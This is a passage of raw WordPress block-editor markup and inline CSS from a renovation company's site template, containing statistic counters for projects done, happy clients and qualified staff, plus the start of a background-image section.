{\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"15454e94-baea-43b6-bd47-7e960bc3f840\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">341+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"6b12791c-0422-4fd5-afdb-743de813f280\"} -->\n<style type=\"text/css\"> .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b12791c-0422-4fd5-afdb-743de813f280 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6b12791c-0422-4fd5-afdb-743de813f280\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"1dc4517d-60d4-498d-b5f8-05c6b761c25e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1dc4517d-60d4-498d-b5f8-05c6b761c25e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"6a895e67-fb7e-485b-ad64-1dca51a18e5b\"} -->\n<style type=\"text/css\"> .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a895e67-fb7e-485b-ad64-1dca51a18e5b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a895e67-fb7e-485b-ad64-1dca51a18e5b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"27d4a194-b2dc-4dbb-a8f5-390309e75841\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-27d4a194-b2dc-4dbb-a8f5-390309e75841 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4b6b3810-9c4f-491a-ab36-74ce4fa3ffbe.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"d4365c9c-8542-4cda-bf8d-13d6a10eb2a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d4365c9c-8542-4cda-bf8d-13d6a10eb2a9 .responsive-heading-seperator {\n 